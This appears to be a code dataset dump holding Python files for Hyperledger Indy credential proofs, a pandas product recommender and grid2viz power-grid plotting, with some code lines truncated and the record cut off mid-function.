null,\n \"referent\": \"b42ce5bc-b690-43cd-9493-6fe86ad25e85\",\n \"cred_def_id\": \"LjgpST2rjsoxYegQDRm7EL:3:CL:17:0\"\n }\n }\n ]'\n }\n \"\"\"\n\n LOGGER.debug(\n ('HolderProver.get_cred_briefs_by_proof_req_query >>> proof_req_json: %s, x_queries_json: %s'),\n proof_req_json,\n x_queries_json)\n\n rv = None\n\n x_queries = json.loads(x_queries_json or '{}')\n for k in x_queries:\n x_queries[k] = canon_wql(x_queries[k]) # indy-sdk requires attr name canonicalization\n\n handle = await anoncreds.prover_search_credentials_for_proof_req(\n self.wallet.handle,\n proof_req_json,\n json.dumps(x_queries) if x_queries else None)\n briefs = []\n cred_ids = set()\n proof_req = json.loads(proof_req_json)\n\n try:\n for item_referent in (x_queries\n if x_queries\n else {**proof_req['requested_attributes'], **proof_req['requested_predicates']}):\n count = Wallet.DEFAULT_CHUNK\n while count == Wallet.DEFAULT_CHUNK:\n fetched = json.loads(await anoncreds.prover_fetch_credentials_for_proof_req(\n handle,\n item_referent,\n Wallet.DEFAULT_CHUNK))\n count = len(fetched)\n for brief in fetched:\n if brief['cred_info']['referent'] not in cred_ids:\n cred_ids.add(brief['cred_info']['referent'])\n briefs.append(brief)\n finally:\n await anoncreds.prover_close_credentials_search_for_proof_req(handle)\n\n rv = (cred_ids, json.dumps(briefs))\n LOGGER.debug('HolderProver.get_cred_briefs_by_proof_req_query <<< %s', rv)\n return rv\n\n\n async def create_proof(self, proof_req: dict, creds: Union[dict, list], requested_creds: dict) -> str:\n \"\"\"\n Create proof as HolderProver.\n\n Raise:\n * AbsentLinkSecret if link secret not set\n * CredentialFocus on attempt to create proof on no creds or multiple creds for a credential definition\n * AbsentTails if missing required tails file\n * BadRevStateTime if a timestamp for a revocation registry state in the proof request\n occurs before revocation registry creation\n * IndyError for any other indy-sdk error.\n * AbsentInterval if creds missing non-revocation interval, but cred def supports revocation\n\n :param proof_req: proof request as per get_creds() above\n :param creds: credentials to prove: indy-sdk creds structure or list of cred-briefs\n :param requested_creds: data structure with self-attested attribute info, requested attribute info\n and requested predicate info, assembled from get_creds() and filtered for content of interest. I.e.,\n\n ::\n\n {\n 'self_attested_attributes': {},\n 'requested_attributes': {\n 'attr0_uuid': {\n 'cred_id': string,\n 'timestamp': integer, # for revocation state\n 'revealed': bool\n },\n ...\n },\n 'requested_predicates': {\n 'predicate0_uuid': {\n 'cred_id': string,\n 'timestamp': integer # for revocation state\n }\n }\n }\n\n :return: proof json\n \"\"\"\n\n LOGGER.debug(\n 'HolderProver.create_proof >>> proof_req: %s, creds: %s, requested_creds: %s',\n proof_req,\n creds,\n requested_creds)\n\n self._assert_link_secret('create_proof')\n\n if isinstance(creds, dict):\n x_uuids = [attr_uuid for attr_uuid in creds['attrs'] if len(creds['attrs'][attr_uuid]) != 1]\n if x_uuids:\n LOGGER.debug('HolderProver.create_proof: int(time()):\n LOGGER.debug(\n 'HolderProver.create_proof: str:\n \"\"\"\n Close and delete HolderProver wallet, then create and open a replacement on prior link secret.\n Note that this operation effectively destroys private keys for credential definitions. Its\n intended use is primarily for testing and demonstration.\n\n Raise AbsentLinkSecret if link secret not set.\n\n :return: wallet name\n \"\"\"\n\n LOGGER.debug('HolderProver.reset_wallet >>>')\n\n self._assert_link_secret('reset_wallet')\n\n seed = self.wallet._seed\n wallet_name = self.wallet.name\n wallet_auto_remove = self.wallet.auto_remove\n wallet_cfg = self.wallet.cfg\n wallet_cfg['auto-remove'] = wallet_auto_remove\n wallet_xtype = self.wallet.xtype\n wallet_access_creds = self.wallet.access_creds\n\n await self.wallet.close()\n if not self.wallet.auto_remove:\n await self.wallet.remove()\n self.wallet = await Wallet(\n seed,\n wallet_name,\n wallet_xtype,\n wallet_cfg,\n wallet_access_creds).create()\n await self.wallet.open()\n\n await self.create_link_secret(self._link_secret) # carry over link secret to new wallet\n\n rv = self.wallet.name\n LOGGER.debug('HolderProver.reset_wallet <<< %s', rv)\n return rv\n", "repo_name": "AlwaysFurther/von_anchor", "sub_path": "von_anchor/anchor/holder_prover.py", "file_name": "holder_prover.py", "file_ext": "py", "file_size_in_byte": 58368, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "von_anchor.anchor.base._BaseAnchor", "line_number": 43, "usage_type": "name"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 50, "usage_type": "name"}, {"api_name": "von_anchor.nodepool.NodePool", "line_number": 50, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 72, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 73, "usage_type": "call"}, {"api_name": "von_anchor.validate_config.validate_config", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 78, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 79, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentLinkSecret", "line_number": 92, "usage_type": "call"}, {"api_name": "von_anchor.validate_config.validate_config", "line_number": 113, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_rev_reg_id", "line_number": 138, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 140, "usage_type": "call"}, {"api_name": "von_anchor.util.rev_reg_id2cred_def_id_tag", "line_number": 142, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 145, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentCredDef", "line_number": 146, "usage_type": "name"}, {"api_name": "von_anchor.error.AbsentCredDef", "line_number": 149, "usage_type": "call"}, {"api_name": "von_anchor.error.ClosedPool", "line_number": 150, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.lock", "line_number": 153, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 153, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.get", "line_number": 154, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 154, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails", "line_number": 158, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentTails", "line_number": 159, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 162, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.dir", "line_number": 162, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 162, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 163, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentTails", "line_number": 165, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.associate", "line_number": 166, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 166, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails", "line_number": 167, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 170, "usage_type": "name"}, {"api_name": "von_anchor.cache.RevoCacheEntry", "line_number": 170, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 172, "usage_type": "name"}, {"api_name": "von_anchor.util.ok_rev_reg_id", "line_number": 199, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 201, "usage_type": "call"}, {"api_name": "indy.ledger.build_get_revoc_reg_delta_request", "line_number": 206, "usage_type": "call"}, {"api_name": "indy.ledger", "line_number": 206, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 208, "usage_type": "call"}, {"api_name": "indy.ledger.parse_get_revoc_reg_delta_response", "line_number": 212, "usage_type": "call"}, {"api_name": "indy.ledger", "line_number": 212, "usage_type": "name"}, {"api_name": "indy.error.IndyError", "line_number": 213, "usage_type": "name"}, {"api_name": "von_anchor.error.AbsentRevReg", "line_number": 215, "usage_type": "call"}, {"api_name": "von_anchor.error.BadRevStateTime", "line_number": 221, "usage_type": "call"}, {"api_name": "indy.anoncreds.issuer_merge_revocation_registry_deltas", "line_number": 224, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 224, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 225, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 302, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 304, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 307, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentCredDef", "line_number": 308, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 358, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_rev_reg_id", "line_number": 372, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 374, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.dir", "line_number": 376, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 376, "usage_type": "name"}, {"api_name": "von_anchor.cache.Caches.parse", "line_number": 393, "usage_type": "call"}, {"api_name": "von_anchor.cache.Caches", "line_number": 393, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 395, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 395, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 396, "usage_type": "call"}, {"api_name": "von_anchor.cache.Caches.purge_archives", "line_number": 413, "usage_type": "call"}, {"api_name": "von_anchor.cache.Caches", "line_number": 413, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 416, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 416, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 417, "usage_type": "call"}, {"api_name": "von_anchor.error.ClosedPool", "line_number": 420, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 435, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 435, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 436, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 438, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 438, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 438, "usage_type": "name"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 478, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 480, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 483, "usage_type": "call"}, {"api_name": "von_anchor.error.ClosedPool", "line_number": 484, "usage_type": "name"}, {"api_name": "von_anchor.error.CacheIndex", "line_number": 486, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE.lock", "line_number": 490, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 490, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.dflt_interval", "line_number": 491, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 491, "usage_type": "name"}, {"api_name": "von_anchor.error.CacheIndex", "line_number": 496, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_create_master_secret", "line_number": 515, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 515, "usage_type": "name"}, {"api_name": "indy.error.IndyError", "line_number": 516, "usage_type": "name"}, {"api_name": "indy.error.ErrorCode.AnoncredsMasterSecretDuplicateNameError", "line_number": 517, "usage_type": "attribute"}, {"api_name": "indy.error.ErrorCode", "line_number": 517, "usage_type": "name"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 542, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 544, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 550, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 552, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentSchema", "line_number": 557, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_create_credential_req", "line_number": 558, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 558, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 585, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_store_credential", "line_number": 593, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 593, "usage_type": "name"}, {"api_name": "time.time", "line_number": 617, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 618, "usage_type": "call"}, {"api_name": "von_anchor.cache.SCHEMA_CACHE.lock", "line_number": 620, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.SCHEMA_CACHE", "line_number": 620, "usage_type": "name"}, {"api_name": "von_anchor.cache.CRED_DEF_CACHE.lock", "line_number": 623, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.CRED_DEF_CACHE", "line_number": 623, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.lock", "line_number": 627, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 627, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.get", "line_number": 628, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 628, "usage_type": "name"}, {"api_name": "von_anchor.error.ClosedPool", "line_number": 632, "usage_type": "name"}, {"api_name": "von_anchor.cache.Caches.archive", "line_number": 641, "usage_type": "call"}, {"api_name": "von_anchor.cache.Caches", "line_number": 641, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 683, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 683, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 683, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 687, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 687, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 691, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 692, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 692, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 692, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 695, "usage_type": "call"}, {"api_name": "von_anchor.util.cred_def_id2seq_no", "line_number": 695, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 699, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 699, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 705, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 705, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 709, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_search_credentials", "line_number": 775, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 775, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 777, "usage_type": "call"}, {"api_name": "von_anchor.codec.canon_wql", "line_number": 777, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 777, "usage_type": "call"}, {"api_name": "von_anchor.wallet.Wallet.DEFAULT_CHUNK", "line_number": 778, "usage_type": "attribute"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 778, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 783, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_fetch_credentials", "line_number": 783, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 783, "usage_type": "name"}, {"api_name": "indy.anoncreds.prover_close_credentials_search", "line_number": 790, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 790, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 792, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_get_credentials", "line_number": 838, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 838, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 838, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_get_credential", "line_number": 872, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 872, "usage_type": "name"}, {"api_name": "indy.error.IndyError", "line_number": 873, "usage_type": "name"}, {"api_name": "indy.error.ErrorCode.WalletItemNotFound", "line_number": 874, "usage_type": "attribute"}, {"api_name": "indy.error.ErrorCode", "line_number": 874, "usage_type": "name"}, {"api_name": "von_anchor.error.AbsentCred", "line_number": 879, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_get_credentials_for_proof_req", "line_number": 1003, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1003, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1004, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 1010, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentCredDef", "line_number": 1011, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1042, "usage_type": "call"}, {"api_name": "von_anchor.util.prune_creds_json", "line_number": 1042, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1044, "usage_type": "call"}, {"api_name": "typing.Set", "line_number": 891, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1157, "usage_type": "call"}, {"api_name": "von_anchor.codec.canon_wql", "line_number": 1159, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_search_credentials_for_proof_req", "line_number": 1161, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1161, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 1164, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 1167, "usage_type": "call"}, {"api_name": "von_anchor.wallet.Wallet.DEFAULT_CHUNK", "line_number": 1173, "usage_type": "attribute"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 1173, "usage_type": "name"}, {"api_name": "von_anchor.wallet.Wallet.DEFAULT_CHUNK", "line_number": 1174, "usage_type": "attribute"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 1174, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1175, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_fetch_credentials_for_proof_req", "line_number": 1175, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1175, "usage_type": "name"}, {"api_name": "von_anchor.wallet.Wallet.DEFAULT_CHUNK", "line_number": 1178, "usage_type": "attribute"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 1178, "usage_type": "name"}, {"api_name": "indy.anoncreds.prover_close_credentials_search_for_proof_req", "line_number": 1185, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1185, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 1187, "usage_type": "call"}, {"api_name": "typing.Set", "line_number": 1051, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 1192, "usage_type": "name"}, {"api_name": "von_anchor.error.CredentialFocus", "line_number": 1245, "usage_type": "call"}, {"api_name": "von_anchor.error.CredentialFocus", "line_number": 1256, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_schema_id", "line_number": 1267, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 1269, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 1272, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentSchema", "line_number": 1277, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 1282, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 1284, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 1287, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_rev_reg_id", "line_number": 1292, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 1294, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1299, "usage_type": "call"}, {"api_name": "von_anchor.error.BadRevStateTime", "line_number": 1304, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentInterval", "line_number": 1312, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE.lock", "line_number": 1318, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 1318, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.get", "line_number": 1320, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 1320, "usage_type": "name"}, {"api_name": "von_anchor.error.AbsentTails", "line_number": 1324, "usage_type": "call"}, {"api_name": "indy.anoncreds.create_revocation_state", "line_number": 1330, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1330, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1337, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_create_proof", "line_number": 1340, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1340, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 1342, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1343, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1345, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1346, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1347, "usage_type": "call"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 1377, "usage_type": "call"}]}
+{"seq_id": "41052188160", "text": "import pandas as pd\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n# Load the dataset containing customer purchase history\ndataset = pd.read_csv('customer_purchase_history.csv')\n\n# Perform data preprocessing and feature engineering\n# ...\n\n# Create a user-item matrix\nuser_item_matrix = dataset.pivot_table(index='CustomerID', columns='ProductID', values='PurchaseCount')\n\n# Calculate item-item similarity matrix using cosine similarity\nitem_similarity = cosine_similarity(user_item_matrix.fillna(0))\n\n# Function to generate personalized recommendations for a given user\ndef generate_recommendations(user_id, top_n):\n user_ratings = user_item_matrix.loc[user_id]\n similar_items = pd.Series(0, index=user_item_matrix.columns)\n \n # Calculate the weighted average of item ratings based on similarity scores\n for item_id, rating in user_ratings.iteritems():\n similar_items += item_similarity[item_id] * rating\n \n # Exclude items already purchased by the user\n similar_items = similar_items.drop(user_ratings.index)\n \n # Sort items based on their weighted ratings\n top_items = similar_items.sort_values(ascending=False).head(top_n)\n \n return top_items.index.tolist()\n\n# Generate personalized recommendations for a specific user\nuser_id = '12345'\ntop_n = 5\nrecommendations = generate_recommendations(user_id, top_n)\n\n# Print the recommended product IDs\nprint(f\"Recommended Products for User {user_id}:\")\nfor product_id in recommendations:\n print(product_id)\n", "repo_name": "syed-bot/midterm2023", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1509, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "sklearn.metrics.pairwise.cosine_similarity", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "42951645536", "text": "import configparser\nimport itertools\nimport json\nimport os\nimport time\nfrom pathlib import Path\nimport pickle\nimport gzip\n\nfrom colorama import Fore, Style\nimport dill\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport plotly.graph_objects as go\nfrom scipy.spatial import ConvexHull\nfrom grid2op.Episode import EpisodeData\nfrom grid2op.PlotGrid import PlotPlotly, PlotMatplot\n\nfrom grid2viz.src.kpi.EpisodeAnalytics import EpisodeAnalytics\n\n# refer to https://github.com/rte-france/Grid2Op/blob/master/getting_started/8_PlottingCapabilities.ipynb for better usage\n\ngraph = None\ngraph_matplotlib = None\n\n\n# TODO: addSubstationColor - integrate that into grid2op Plotgrid\ndef add_substation_color_matplot(subs, plot_helper, fig):\n radius_size = plot_helper._sub_radius\n # fig = plot_helper.plot_layout()\n ax = fig.gca()\n\n for id_sub in subs:\n subName = \"sub_\" + str(id_sub)\n x, y = plot_helper._grid_layout[subName]\n circle = plt.Circle((x, y), int(radius_size), color=\"gold\")\n ax.add_artist(circle)\n\n return fig\n\n\ndef add_substation_color_plotly(subs, plot_helper, fig, color=\"gold\"):\n radius_size = int(plot_helper._sub_radius * 0.8)\n\n for id_sub in subs:\n subName = \"sub_\" + str(id_sub)\n x_center, y_center = plot_helper._grid_layout[subName]\n\n marker_dict = dict(\n size=radius_size,\n color=color,\n showscale=False,\n opacity=0.5,\n )\n fig.add_trace(\n go.Scatter(\n x=[x_center],\n y=[y_center],\n mode=\"markers\",\n text=[subName],\n name=\"sub\" + subName,\n marker=marker_dict,\n showlegend=False,\n )\n )\n return fig\n\ndef add_alarm_area_plotly(line_subs, plot_helper, fig, color=\"gold\"):\n\n x=[]\n y=[]\n for id_sub in line_subs:\n subName = \"sub_\" + str(id_sub)\n x_center, y_center = plot_helper._grid_layout[subName]\n x.append(x_center)\n y.append(y_center)\n\n points = [[lx, ly] for lx, ly in zip(x, y)]\n hull = ConvexHull(points)\n hull_vertices_x = [x[i] for i in hull.vertices]\n hull_vertices_y = [y[i] for i in hull.vertices]\n fig.add_trace(go.Scatter(\n x=hull_vertices_x,\n y=hull_vertices_y,\n marker=dict(color=color, size=2),\n mode=\"markers\",\n # name=\"Women\",\n fill=\"toself\",\n opacity=0.5\n ))\n return fig\n\n\n\ndef make_network(episode, responsive=True):\n \"\"\"\n Create a Plotly network graph with the layout configuration and the selected episode.\n\n :param episode: An episode containing targeted data for the graph.\n :return: Network graph\n \"\"\"\n global graph\n if graph is None:\n graph = PlotPlotly(\n grid_layout=episode.observation_space.grid_layout,\n observation_space=episode.observation_space,\n responsive=responsive,\n )\n return graph\n\n\ndef make_network_matplotlib(episode,timestep=0):\n global graph_matplotlib\n if graph_matplotlib is None:\n graph_matplotlib = PlotMatplot(\n grid_layout=episode.observation_space.grid_layout,\n observation_space=episode.observation_space,\n line_name=False,\n gen_name=False,\n load_name=False,\n )\n return graph_matplotlib\n\n\n######\n# we want a non responsive graph for now in agent_study\n# so we have to define it differently from the global graph in make_network that we don't use here\nimport base64\nimport io\ndef make_network_agent_study(episode, timestep, figure_obs=None, responsive=False,redraw=False):\n # subs_on_bus_2 = np.repeat(False, episode_data.observations[0].n_sub)\n #graph=None\n #if(isMatplotLib):########not working for now. Was trying to use matplotlib to accelerate ploting time\n # buf = io.BytesIO()\n # make_network_scenario_overview(episode,timestep=timestep)\n#\n#\n # # plt.figure(network_graph.number)\n # # plt.close(fig)\n # plt.savefig(buf, format=\"png\")\n # buf.seek(0)\n # #encoded_image = base64.b64encode(buf.read())\n#\n # #fig=encoded_image.decode()\n # data = base64.b64encode(buf.getbuffer()).decode(\"utf8\") # encode to html elements\n # buf.close()\n # return \"data:image/png;base64,{}\".format(data)\n\n observation=episode.observations[timestep]\n\n graph=make_network(episode, responsive)\n graph._sub_radius = 30 # instead of 25 by default\n graph._bus_radius = 10 # instead of 4 by default\n if(figure_obs)and not redraw:# don't redraw it from scratch, just change what is needed\n\n import plotly.colors as pc\n data_fig=figure_obs[\"data\"]#go.Figure(figure_obs)\n\n rho_lines=observation.rho\n n_lines=len(rho_lines)\n\n id_line=0\n i_traces=0\n previous_trace=None\n while id_line= 2\n ]\n fig = add_substation_color_plotly(\n sub_2buses, graph, fig, color=\"green\"\n ) # also other color for subs not in ref topo\n\n if (\"is_alarm\" in episode.action_data_table.columns):\n alarms_lines_area = episode.observations[timestep].alarms_lines_area\n\n light_colors_plotly = [\"lightcoral\", \"lightsalmon\", \"lightpink\"]\n n_colors = len(light_colors_plotly)\n\n if (episode.action_data_table.is_alarm[timestep]):\n\n alarm_zones = episode.action_data_table.alarm_zone[timestep]\n\n for i_zone,zone in enumerate(alarm_zones):\n id_lines_alarm = []\n for idx, line_name in enumerate(episode.observations[timestep].name_line):\n line_alarm_zones = alarms_lines_area[line_name]\n if(zone in line_alarm_zones):\n id_lines_alarm.append(idx)\n line_subs = [episode.observations[timestep].line_ex_to_subid[l_idx] for l_idx in id_lines_alarm]\n line_subs += [episode.observations[timestep].line_or_to_subid[l_idx] for l_idx in id_lines_alarm]\n line_subs = np.unique(line_subs)\n\n area_color= i_zone % n_colors\n fig = add_alarm_area_plotly(line_subs, graph, fig, color=light_colors_plotly[area_color])\n\n return fig\n\n\ndef make_network_agent_overview(episode):\n graph = make_network(episode)\n\n # modified_lines = actions_model.get_modified_lines(episode)\n # line_values = [None] * episode.n_lines\n # for line in modified_lines.index:\n # line_values[np.where(episode.line_names == line)[0][0]] = line\n\n lines_attacked = list(\n episode.attacks_data_table[\"id_lines\"][\n episode.attacks_data_table.attack\n ].unique()\n )\n lines_overflowed_ids = list(\n itertools.chain.from_iterable(episode.total_overflow_ts.line_ids)\n )\n # to color assets on our graph with different colors while not overloading it with information\n # we will use plot_obs instead of plot_info for now\n ####\n # For that we override an observation with the desired values\n obs_colored = episode.observations[0]\n\n # having a rho with value 1.0 give us a red line while 0.7 gives us an orange line and 0.3 a blue line\n rho_to_color = np.array(\n [\n float(0.6) if line in lines_attacked else float(0.3)\n for line in episode.line_names\n ]\n )\n rho_to_color[lines_overflowed_ids] = 1.0\n line_status_colored = np.array(\n [False if line in lines_attacked else True for line in episode.line_names]\n )\n obs_colored.rho = rho_to_color\n obs_colored.line_status = line_status_colored\n\n # network_graph = make_network(episode).plot_info(\n # line_values=[ line if line in lines_attacked else None for line in episode.line_names]\n # #coloring=\"line\"\n # )\n # )\n fig = graph.plot_obs(obs_colored, line_info=None, gen_info=None, load_info=None)\n\n ##########\n # We color subs where we had actions\n sub_name_modified = list(\n itertools.chain.from_iterable(episode.action_data_table.subs_modified)\n )\n sub_id_modified = set([int(str.split(\"_\")[1]) for str in sub_name_modified])\n fig = add_substation_color_plotly(sub_id_modified, graph, fig)\n\n return fig\n\n\ndef make_network_scenario_overview(episode,timestep=0):\n max_loads = (\n episode.load[[\"value\", \"equipement_id\"]]\n .groupby(\"equipement_id\")\n .max()\n .sort_index()\n )\n max_gens = (\n episode.production[[\"value\", \"equipement_id\"]]\n .groupby(\"equipement_id\")\n 